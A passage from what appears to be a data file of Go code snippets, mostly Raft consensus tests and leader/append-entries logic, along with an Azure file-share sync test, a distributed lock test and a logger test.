{\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n}", "func TestLeaderAcknowledgeCommit(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tacceptors map[uint64]bool\n\t\twack bool\n\t}{\n\t\t{1, nil, true},\n\t\t{3, nil, false},\n\t\t{3, map[uint64]bool{2: true}, true},\n\t\t{3, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, nil, false},\n\t\t{5, map[uint64]bool{2: true}, false},\n\t\t{5, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, true},\n\t}\n\tfor i, tt := range tests {\n\t\ts := NewMemoryStorage()\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, s)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeCandidate()\n\t\tr.becomeLeader()\n\t\tcommitNoopEntry(r, s)\n\t\tli := r.raftLog.lastIndex()\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\t\tfor _, m := range r.readMessages() {\n\t\t\tif tt.acceptors[m.To] {\n\t\t\t\tr.Step(acceptAndReply(m))\n\t\t\t}\n\t\t}\n\n\t\tif g := r.raftLog.committed > li; g != tt.wack {\n\t\t\tt.Errorf(\"#%d: ack commit = %v, want %v\", i, g, tt.wack)\n\t\t}\n\t}\n}", "func TestPeerManager(t *testing.T) {\n\n\tseeds := []string {\"127.0.0.1:6000\",}\n\tmanager1 := CreatePeerManager(6000, 6001, nil, FullMode)\n\tmanager2 := CreatePeerManager(7000, 7001, seeds, FullMode)\n\tmanager3 := CreatePeerManager(8000, 8001, seeds, FullMode)\n\n\tallPeers := []string {\"127.0.0.1:6001\", \"127.0.0.1:7001\", \"127.0.0.1:8001\"}\n\tPeerManagerPropagationHelper(t, manager1, manager2, manager3, \n\t\t\t\t\t\t\t\tallPeers, allPeers, allPeers, nil, time.Second, 2*time.Second)\t\n}", "func TestRaftAddOneNode(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftAddOneNode\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it to be elected as leader.\n\t<-fsm1.leaderCh\n\n\t// Propose two commands to the cluster. Now the cluster only contains node n1.\n\tn1.Propose([]byte(\"data1\"))\n\tpending := n1.Propose([]byte(\"data2\"))\n\t<-pending.Done\n\n\t// Add node n2 to the cluster.\n\tpending = n1.AddNode(ID2)\n\n\t// The reconfiguration will be blocked until n2 starts. Because the\n\t// new configuration needs to be committed in new quorum\n\tselect {\n\tcase <-pending.Done:\n\t\t// The node might step down, in that case 'ErrNotLeaderAnymore' will be\n\t\t// returned.\n\t\tif pending.Err == nil {\n\t\t\tt.Fatalf(\"the proposed command should fail as the cluster doesn't have a quorum\")\n\t\t}\n\tcase <-time.After(10 * time.Millisecond):\n\t}\n\n\t// Start n2 as a joiner.\n\tn2.Start(fsm2)\n\n\t// Two FSMs should apply all 2 commands, eventually.\n\tif !testEntriesEqual(fsm1.appliedCh, fsm2.appliedCh, 2) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func (rf *Raft) convertToLeader() {\n rf.mu.Lock()\n DLCPrintf(\"Server (%d)[state=%s, term=%d, votedFor=%d] convert to Leader\", rf.me, rf.state, rf.currentTerm, rf.votedFor)\n rf.electionTimer.Stop() \n rf.state = \"Leader\"\n for i:=0; i<len(rf.peers); i++ {\n rf.nextIndex[i] = rf.convertToGlobalViewIndex(len(rf.log))\n rf.matchIndex[i] = rf.convertToGlobalViewIndex(0)\n }\n rf.mu.Unlock()\n // 启动一个线程,定时给各个Follower发送HeartBeat Request \n time.Sleep(50 * time.Millisecond)\n go rf.sendAppendEntriesToMultipleFollowers()\n}", "func (s *raftServer) lead() {\n\ts.hbTimeout.Reset(time.Duration(s.config.HbTimeoutInMillis) * time.Millisecond)\n\t// launch a goroutine to handle followersFormatInt(\n\tfollower := s.followers()\n\tnextIndex, matchIndex, aeToken := s.initLeader(follower)\n\ts.leaderId.Set(s.server.Pid())\n\n\tgo s.handleFollowers(follower, nextIndex, matchIndex, aeToken)\n\tgo s.updateLeaderCommitIndex(follower, matchIndex)\n\tfor s.State() == LEADER {\n\t\tselect {\n\t\tcase <-s.hbTimeout.C:\n\t\t\t//s.writeToLog(\"Sending hearbeats\")\n\t\t\ts.sendHeartBeat()\n\t\t\ts.hbTimeout.Reset(time.Duration(s.config.HbTimeoutInMillis) * time.Millisecond)\n\t\tcase msg := <-s.outbox:\n\t\t\t// received message from state machine\n\t\t\ts.writeToLog(\"Received message from state machine layer\")\n\t\t\ts.localLog.Append(&raft.LogEntry{Term: s.Term(), Data: msg})\n\t\tcase e := <-s.server.Inbox():\n\t\t\traftMsg := e.Msg\n\t\t\tif ae, ok := raftMsg.(AppendEntry); ok { // AppendEntry\n\t\t\t\ts.handleAppendEntry(e.Pid, &ae)\n\t\t\t} else if rv, ok := raftMsg.(RequestVote); ok { // RequestVote\n\t\t\t\ts.handleRequestVote(e.Pid, &rv)\n\t\t\t} else if entryReply, ok := raftMsg.(EntryReply); ok {\n\t\t\t\tn, found := nextIndex.Get(e.Pid)\n\t\t\t\tvar m int64\n\t\t\t\tif !found {\n\t\t\t\t\tpanic(\"Next index not found for follower \" + strconv.Itoa(e.Pid))\n\t\t\t\t} else {\n\t\t\t\t\tm, found = matchIndex.Get(e.Pid)\n\t\t\t\t\tif !found {\n\t\t\t\t\t\tpanic(\"Match index not found for follower \" + strconv.Itoa(e.Pid))\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif entryReply.Success {\n\t\t\t\t\t// update nextIndex for follower\n\t\t\t\t\tif entryReply.LogIndex != HEARTBEAT {\n\t\t\t\t\t\taeToken.Set(e.Pid, 1)\n\t\t\t\t\t\tnextIndex.Set(e.Pid, max(n+1, entryReply.LogIndex+1))\n\t\t\t\t\t\tmatchIndex.Set(e.Pid, max(m, entryReply.LogIndex))\n\t\t\t\t\t\t//s.writeToLog(\"Received confirmation from \" + strconv.Itoa(e.Pid))\n\t\t\t\t\t}\n\t\t\t\t} else if s.Term() >= entryReply.Term {\n\t\t\t\t\tnextIndex.Set(e.Pid, n-1)\n\t\t\t\t} else {\n\t\t\t\t\ts.setState(FOLLOWER)\n\t\t\t\t\t// There are no other goroutines active\n\t\t\t\t\t// at this point which modify term\n\t\t\t\t\tif s.Term() >= entryReply.Term {\n\t\t\t\t\t\tpanic(\"Follower replied false even when Leader's term is not smaller\")\n\t\t\t\t\t}\n\t\t\t\t\ts.setTerm(entryReply.Term)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\ts.hbTimeout.Stop()\n}", "func TestFileSyncS2SBetweenDirs(t *testing.T) {\n\ta := assert.New(t)\n\tfsc := getFileServiceClient()\n\tsrcShareClient, srcShareName := createNewShare(a, fsc)\n\tdstShareClient, dstShareName := createNewShare(a, fsc)\n\tdefer deleteShare(a, srcShareClient)\n\tdefer deleteShare(a, dstShareClient)\n\n\t// set up the source share with numerous files\n\tdirName := \"dir\"\n\tfileList := scenarioHelper{}.generateCommonRemoteScenarioForAzureFile(a, srcShareClient, fsc, dirName+common.AZCOPY_PATH_SEPARATOR_STRING)\n\ta.NotZero(len(fileList))\n\n\t// set up the destination with the exact same files\n\tscenarioHelper{}.generateShareFilesFromList(a, dstShareClient, fsc, fileList)\n\n\t// set up interceptor\n\tmockedRPC := interceptor{}\n\tRpc = mockedRPC.intercept\n\tmockedRPC.init()\n\n\t// construct the raw input to simulate user input\n\tsrcShareURLWithSAS := scenarioHelper{}.getRawShareURLWithSAS(a, srcShareName)\n\tdstShareURLWithSAS := scenarioHelper{}.getRawShareURLWithSAS(a, dstShareName)\n\tsrcShareURLWithSAS.Path += common.AZCOPY_PATH_SEPARATOR_STRING + dirName\n\tdstShareURLWithSAS.Path += common.AZCOPY_PATH_SEPARATOR_STRING + dirName\n\traw := getDefaultSyncRawInput(srcShareURLWithSAS.String(), dstShareURLWithSAS.String())\n\n\t// nothing should be synced since the source is older\n\trunSyncAndVerify(a, raw, func(err error) {\n\t\ta.Nil(err)\n\n\t\t// validate that the right number of transfers were scheduled\n\t\ta.Zero(len(mockedRPC.transfers))\n\t})\n\n\t// refresh the files' last modified time so that they are newer\n\tscenarioHelper{}.generateShareFilesFromList(a, srcShareClient, fsc, fileList)\n\tmockedRPC.reset()\n\texpectedList := scenarioHelper{}.shaveOffPrefix(fileList, dirName+common.AZCOPY_PATH_SEPARATOR_STRING)\n\trunSyncAndVerify(a, raw, func(err error) {\n\t\ta.Nil(err)\n\t\tvalidateS2SSyncTransfersAreScheduled(a, \"\", \"\", expectedList, mockedRPC)\n\t})\n}", "func TestRaftPending(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftPending\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower = n2\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower = n1\n\t}\n\n\t// Prpose a command on leader.\n\tpending := leader.Propose([]byte(\"I'm data\"))\n\n\t// Block until the command concludes.\n\t<-pending.Done\n\n\t// \"Apply\" should return the exact command back.\n\tif pending.Err != nil {\n\t\tt.Fatal(\"expected no error returned in pending\")\n\t}\n\tif string(pending.Res.([]byte)) != \"I'm data\" {\n\t\tt.Fatal(\"expected exact command to be returned in pending.\")\n\t}\n\n\t// Propose to non-leader node should result an error.\n\tpending = follower.Propose([]byte(\"I'm data too\"))\n\n\t// Block until the command concludes.\n\t<-pending.Done\n\n\t// Should return an error \"ErrNodeNotLeader\" when propose command to non-leader node.\n\tif pending.Err != ErrNodeNotLeader {\n\t\tt.Fatalf(\"expected to get error %q when propose to non-leader node\", ErrNodeNotLeader)\n\t}\n}", "func TestLearnerReceiveSnapshot(t *testing.T) {\n\t// restore the state machine from a snapshot so it has a compacted log and a snapshot\n\ts := pb.Snapshot{\n\t\tMetadata: pb.SnapshotMetadata{\n\t\t\tIndex: 11, // magic number\n\t\t\tTerm: 11, // magic number\n\t\t\tConfState: pb.ConfState{Nodes: []uint64{1}, Learners: []uint64{2}},\n\t\t},\n\t}\n\n\tstore := NewMemoryStorage()\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, store)\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.restore(s)\n\tready := newReady(n1, &SoftState{}, pb.HardState{}, true)\n\tstore.ApplySnapshot(ready.Snapshot)\n\tn1.advance(ready)\n\n\t// Force set n1 appplied index.\n\tn1.raftLog.appliedTo(n1.raftLog.committed)\n\n\tnt := newNetwork(n1, n2)\n\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\tif n2.raftLog.committed != n1.raftLog.committed {\n\t\tt.Errorf(\"peer 2 must commit to %d, but %d\", n1.raftLog.committed, n2.raftLog.committed)\n\t}\n}", "func appendEntriesUntilSuccess(raft *spec.Raft, PID int) *responses.Result {\n var result *responses.Result\n var retries int\n\n // If last log index >= nextIndex for a follower,\n // send log entries starting at nextIndex.\n // (??) Otherwise set NextIndex[PID] to len(raft.Log)-1\n if len(raft.Log)-1 < raft.NextIndex[PID] {\n log.Printf(\"[PUTENTRY-X]: [len(raft.Log)-1=%d] [raft.NextIndex[PID]=%d]\\n\", len(raft.Log)-1, raft.NextIndex[PID])\n raft.NextIndex[PID] = len(raft.Log) - 1\n }\n\n log.Printf(\"[PUTENTRY->]: [PID=%d]\", PID)\n for {\n // Regenerate arguments on each call, because\n // raft state may have changed between calls\n spec.RaftRWMutex.RLock()\n args := raft.GetAppendEntriesArgs(&self)\n args.PrevLogIndex = raft.NextIndex[PID] - 1\n args.PrevLogTerm = spec.GetTerm(&raft.Log[args.PrevLogIndex])\n args.Entries = raft.Log[raft.NextIndex[PID]:]\n config.LogIf(\n fmt.Sprintf(\"appendEntriesUntilSuccess() to [PID=%d] with args: T:%v, L:%v, PLI:%v, PLT:%v, LC:%v\",\n PID,\n args.Term,\n args.LeaderId,\n args.PrevLogIndex,\n args.PrevLogTerm,\n args.LeaderCommit,\n ),\n config.C.LogAppendEntries)\n spec.RaftRWMutex.RUnlock()\n result = CallAppendEntries(PID, args)\n log.Println(result)\n\n // Success! Increment next/matchIndex as a function of our inputs\n // Otherwise, decrement nextIndex and try again.\n spec.RaftRWMutex.Lock()\n if result.Success {\n raft.MatchIndex[PID] = args.PrevLogIndex + len(args.Entries)\n raft.NextIndex[PID] = raft.MatchIndex[PID] + 1\n spec.RaftRWMutex.Unlock()\n return result\n }\n\n // Decrement NextIndex if the failure was due to log consistency.\n // If not, update our term and step down\n if result.Term > raft.CurrentTerm {\n raft.CurrentTerm = result.Term\n raft.Role = spec.FOLLOWER\n }\n\n if result.Error != responses.CONNERROR {\n raft.NextIndex[PID] -= 1\n spec.RaftRWMutex.Unlock()\n continue\n }\n\n if retries > 5 {\n spec.RaftRWMutex.Unlock()\n return &responses.Result{Success: false, Error: responses.CONNERROR}\n }\n\n retries++\n time.Sleep(time.Second)\n spec.RaftRWMutex.Unlock()\n }\n}", "func TestSyncer(t *testing.T) {\n\t// we have process with the same ID\n\tid := \"sameid\"\n\taddress := fmt.Sprint(\"localhost:9999\")\n\tcfg := client.Config{\n\t\tEndPoint: address,\n\t\tLockTimeout: time.Duration(10) * time.Second,\n\t}\n\tcli, err := client.NewClient(cfg)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tprocessCount := 10\n\n\tres := make(chan string, processCount*2)\n\tvar i int\n\tfor i < processCount {\n\t\tgo func(a int) {\n\t\t\tcli.Lock(id)\n\t\t\td := getRandomDuration()\n\t\t\tres <- \"start process\"\n\t\t\t// simulate random duration process\n\t\t\ttime.Sleep(time.Duration(d))\n\t\t\tres <- \"finish process\"\n\t\t\tif i > 7 {\n\t\t\t\t// deliberately not unlocking the last 2 process\n\t\t\t\treturn\n\t\t\t}\n\t\t\tcli.Unlock(id)\n\t\t}(i)\n\t\ti += 1\n\t}\n\n\ti = 0\n\tvar msg string\n\tfor i < processCount {\n\t\t// this expect the result will be synchronous\n\t\tmsg = <-res\n\t\tassert.Equal(t, \"start process\", msg)\n\t\tfmt.Println(msg)\n\t\tmsg = <-res\n\t\tassert.Equal(t, \"finish process\", msg)\n\t\tfmt.Println(msg)\n\t\ti += 1\n\t}\n}", "func Test_SimpleLogger(t *testing.T) {\n\tdefer b.Reset()\n\n\tt.Run(\"NoFields\", func(t *testing.T) {\n\t\tdefer b.Reset()\n\t\tlog.InitSimpleLogger(&log.Config{\n\t\t\tOutput: b,\n\t\t})\n\n\t\ttests := []struct {\n\t\t\tlevel string\n\t\t\tfile string\n\t\t\tfunction string\n\t\t\tf func(msg string)\n\t\t}{\n\t\t\t{\n\t\t\t\tlevel: \"ERROR\",\n\t\t\t\tfile: \"log_test.go\",\n\t\t\t\tfunction: \"1()\",\n\t\t\t\tf: log.Error,\n\t\t\t},\n\t\t\t{\n\t\t\t\tlevel: \"INFO \",\n\t\t\t\tfile: \"log_test.go\",\n\t\t\t\tfunction: \"1()\",\n\t\t\t\tf: log.Info,\n\t\t\t},\n\t\t\t{\n\t\t\t\tlevel: \"DEBUG\",\n\t\t\t\tfile: \"log_test.go\",\n\t\t\t\tfunction: \"1()\",\n\t\t\t\tf: log.Debug,\n\t\t\t},\n\t\t\t{\n\t\t\t\tlevel: \"WARN \",\n\t\t\t\tfile: \"log_test.go\",\n\t\t\t\tfunction: \"1()\",\n\t\t\t\tf: log.Warn,\n\t\t\t},\n\t\t}\n\n\t\tfor _, test := range tests {\n\t\t\tt.Run(test.level, func(t *testing.T) {\n\t\t\t\ttest.f(\"there was an error\")\n\t\t\t\tdefer b.Reset()\n\n\t\t\t\tout := b.String()\n\n\t\t\t\tassureSingleNewline(out, t)\n\n\t\t\t\tlevel, file, function, _ := splitMessage(out, t)\n\n\t\t\t\tif level != test.level {\n\t\t\t\t\tt.Errorf(\"expected level: '%s'. actual level: '%s'\", test.level, level)\n\t\t\t\t}\n\n\t\t\t\tif file != test.file {\n\t\t\t\t\tt.Errorf(\"expected file: '%s'. actual file: '%s'\", test.file, file)\n\t\t\t\t}\n\n\t\t\t\tif function != test.function {\n\t\t\t\t\tt.Errorf(\"expected function: '%s'. actual function: '%s'\", test.function, function)\n\t\t\t\t}\n\n\t\t\t\tif len(strings.Split(strings.TrimSpace(out), \"\\n\")) > 1 {\n\t\t\t\t\tt.Errorf(\"expected single line log point: '%s\", out)\n\t\t\t\t}\n\t\t\t})\n\t\t}\n\t})\n\n\tt.Run(\"WithFields\", func(t *testing.T) {\n\t\tdefer b.Reset()\n\t\tt.Run(\"Single Field\", func(t *testing.T) {\n\t\t\tlog.InitSimpleLogger(&log.Config{\n\t\t\t\tOutput: b,\n\t\t\t})\n\n\t\t\ttests := []struct {\n\t\t\t\tlevel string\n\t\t\t\tfile string\n\t\t\t\tfunction string\n\t\t\t\tkey string\n\t\t\t\tvalue interface{}\n\t\t\t\tf func(string)\n\t\t\t}{\n\t\t\t\t{\n\t\t\t\t\tlevel: \"ERROR\",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tkey: \"sample\",\n\t\t\t\t\tvalue: \"banana\",\n\t\t\t\t\tf: log.WithFields(log.Fields{\"sample\": \"banana\"}).Error,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"INFO \",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tkey: \"text\",\n\t\t\t\t\tvalue: 1,\n\t\t\t\t\tf: log.WithFields(log.Fields{\"text\": 1}).Info,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"DEBUG\",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tkey: \"burger\",\n\t\t\t\t\tvalue: []string{\"sorry fellas\"},\n\t\t\t\t\tf: log.WithFields(log.Fields{\"burger\": []string{\"sorry fellas\"}}).Debug,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"WARN \",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tkey: \"salad\",\n\t\t\t\t\tvalue: \"fortnite\",\n\t\t\t\t\tf: log.WithFields(log.Fields{\"salad\": \"fortnite\"}).Warn,\n\t\t\t\t},\n\t\t\t}\n\n\t\t\tfor _, test := range tests {\n\t\t\t\tt.Run(test.level, func(t *testing.T) {\n\t\t\t\t\ttest.f(\"there was an error\")\n\t\t\t\t\tdefer b.Reset()\n\n\t\t\t\t\tout := b.String()\n\n\t\t\t\t\t//t.Log(b.String())\n\n\t\t\t\t\tassureSingleNewline(out, t)\n\n\t\t\t\t\tlevel, file, function, _ := splitMessage(out, t)\n\n\t\t\t\t\tif level != test.level {\n\t\t\t\t\t\tt.Errorf(\"expected level: '%s'. actual level: '%s'\", test.level, level)\n\t\t\t\t\t}\n\n\t\t\t\t\tif file != test.file {\n\t\t\t\t\t\tt.Errorf(\"expected file: '%s'. actual file: '%s'\", test.file, file)\n\t\t\t\t\t}\n\n\t\t\t\t\tif function != test.function {\n\t\t\t\t\t\tt.Errorf(\"expected function: '%s'. actual function: '%s'\", test.function, function)\n\t\t\t\t\t}\n\n\t\t\t\t\tif ok, fields := hasField(test.key, test.value, out, t); !ok {\n\t\t\t\t\t\tt.Errorf(\"expected fields to contain: '%s=%v. actual fields total: %s\", test.key, test.value, fields)\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\n\t\tt.Run(\"Multiple Fields\", func(t *testing.T) {\n\t\t\tdefer b.Reset()\n\t\t\tlog.InitSimpleLogger(&log.Config{\n\t\t\t\tOutput: b,\n\t\t\t})\n\n\t\t\ttests := []struct {\n\t\t\t\tlevel string\n\t\t\t\tfile string\n\t\t\t\tfunction string\n\t\t\t\tfields log.Fields\n\t\t\t\tf func(string)\n\t\t\t}{\n\t\t\t\t{\n\t\t\t\t\tlevel: \"ERROR\",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"one\": 1,\n\t\t\t\t\t\t\"two\": \"2\",\n\t\t\t\t\t\t\"three\": []string{\"1\", \"2\", \"3\"},\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"one\": 1,\n\t\t\t\t\t\t\"two\": \"2\",\n\t\t\t\t\t\t\"three\": []string{\"1\", \"2\", \"3\"},\n\t\t\t\t\t}).Error,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"INFO \",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"sample\": \"this is a long piece of text\",\n\t\t\t\t\t\t\"true\": false,\n\t\t\t\t\t\t\"false\": true,\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"sample\": \"this is a long piece of text\",\n\t\t\t\t\t\t\"true\": false,\n\t\t\t\t\t\t\"false\": true,\n\t\t\t\t\t}).Info,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"WARN \",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"one\": nil,\n\t\t\t\t\t\t\"okay but\": \"epic\",\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"one\": nil,\n\t\t\t\t\t\t\"okay but\": \"epic\",\n\t\t\t\t\t}).Warn,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"DEBUG\",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"teamwork\": -1,\n\t\t\t\t\t\t\"dreamwork\": []bool{false, true},\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"teamwork\": -1,\n\t\t\t\t\t\t\"dreamwork\": []bool{false, true},\n\t\t\t\t\t}).Debug,\n\t\t\t\t},\n\t\t\t}\n\n\t\t\tfor _, test := range tests {\n\t\t\t\tt.Run(test.level, func(t *testing.T) {\n\t\t\t\t\ttest.f(\"burger\")\n\n\t\t\t\t\tdefer b.Reset()\n\n\t\t\t\t\tout := b.String()\n\n\t\t\t\t\t//t.Log(b.String())\n\n\t\t\t\t\tassureSingleNewline(out, t)\n\n\t\t\t\t\tlevel, file, function, _ := splitMessage(out, t)\n\n\t\t\t\t\tif level != test.level {\n\t\t\t\t\t\tt.Errorf(\"expected level: '%s'. actual level: '%s'\", test.level, level)\n\t\t\t\t\t}\n\n\t\t\t\t\tif file != test.file {\n\t\t\t\t\t\tt.Errorf(\"expected file: '%s'. actual file: '%s'\", test.file, file)\n\t\t\t\t\t}\n\n\t\t\t\t\tif function != test.function {\n\t\t\t\t\t\tt.Errorf(\"expected function: '%s'. actual function: '%s'\", test.function, function)\n\t\t\t\t\t}\n\n\t\t\t\t\tfor k, v := range test.fields {\n\t\t\t\t\t\tif ok, fields := hasField(k, v, out, t); !ok {\n\t\t\t\t\t\t\tt.Errorf(\"expected fields to contain: '%s=%v. actual fields total: %s\", k, v, fields)\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\n\t\tt.Run(\"Append Fields\", func(t *testing.T) {\n\t\t\tdefer b.Reset()\n\t\t\tlog.InitSimpleLogger(&log.Config{\n\t\t\t\tOutput: b,\n\t\t\t})\n\n\t\t\ttests := []struct {\n\t\t\t\tlevel string\n\t\t\t\tfile string\n\t\t\t\tfunction string\n\t\t\t\tfields log.Fields\n\t\t\t\tf func(string)\n\t\t\t}{\n\t\t\t\t{\n\t\t\t\t\tlevel: \"ERROR\",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"one\": 1,\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"one\": 1,\n\t\t\t\t\t}).WithFields(log.Fields{}).Error,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"INFO \",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"sample\": \"this is a long piece of text\",\n\t\t\t\t\t\t\"true\": false,\n\t\t\t\t\t\t\"false\": true,\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"sample\": \"this is a long piece of text\",\n\t\t\t\t\t}).WithFields(log.Fields{\n\t\t\t\t\t\t\"false\": true,\n\t\t\t\t\t}).WithFields(log.Fields{\n\t\t\t\t\t\t\"true\": false,\n\t\t\t\t\t}).Info,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"WARN \",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"one\": nil,\n\t\t\t\t\t\t\"okay but\": \"epic\",\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"one\": nil,\n\t\t\t\t\t}).WithFields(log.Fields{\n\t\t\t\t\t\t\"okay but\": \"epic\",\n\t\t\t\t\t}).Warn,\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tlevel: \"DEBUG\",\n\t\t\t\t\tfile: \"log_test.go\",\n\t\t\t\t\tfunction: \"1()\",\n\t\t\t\t\tfields: log.Fields{\n\t\t\t\t\t\t\"teamwork\": -1,\n\t\t\t\t\t\t\"dreamwork\": []bool{false, true},\n\t\t\t\t\t},\n\t\t\t\t\tf: log.WithFields(log.Fields{\n\t\t\t\t\t\t\"teamwork\": -1,\n\t\t\t\t\t}).WithFields(log.Fields{\n\t\t\t\t\t\t\"dreamwork\": []bool{false, true},\n\t\t\t\t\t}).Debug,\n\t\t\t\t},\n\t\t\t}\n\n\t\t\tfor _, test := range tests {\n\t\t\t\tt.Run(test.level, func(t *testing.T) {\n\t\t\t\t\ttest.f(\"burger\")\n\n\t\t\t\t\tdefer b.Reset()\n\n\t\t\t\t\tout := b.String()\n\n\t\t\t\t\t//t.Log(b.String())\n\n\t\t\t\t\tassureSingleNewline(out, t)\n\n\t\t\t\t\tlevel, file, function, _ := splitMessage(out, t)\n\n\t\t\t\t\tif level != test.level {\n\t\t\t\t\t\tt.Errorf(\"expected level: '%s'. actual level: '%s'\", test.level, level)\n\t\t\t\t\t}\n\n\t\t\t\t\tif file != test.file {\n\t\t\t\t\t\tt.Errorf(\"expected file: '%s'. actual file: '%s'\", test.file, file)\n\t\t\t\t\t}\n\n\t\t\t\t\tif function != test.function {\n\t\t\t\t\t\tt.Errorf(\"expected function: '%s'. actual function: '%s'\", test.function, function)\n\t\t\t\t\t}\n\n\t\t\t\t\tfor k, v := range test.fields {\n\t\t\t\t\t\tif ok, fields := hasField(k, v, out, t); !ok {\n\t\t\t\t\t\t\tt.Errorf(\"expected fields to contain: '%s=%v. actual fields total: %s\", k, v, fields)\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\n\t\tt.Run(\"With Error Field\", func(t *testing.T) {\n\t\t\tdefer b.Reset()\n\t\t\tlog.InitSimpleLogger(&log.Config{\n\t\t\t\tOutput: b,\n\t\t\t})\n\n\t\t\ttests := []struct {\n\t\t\t\tlevel string\n\t\t\t\tfile string\n\t\t\t\tfunction 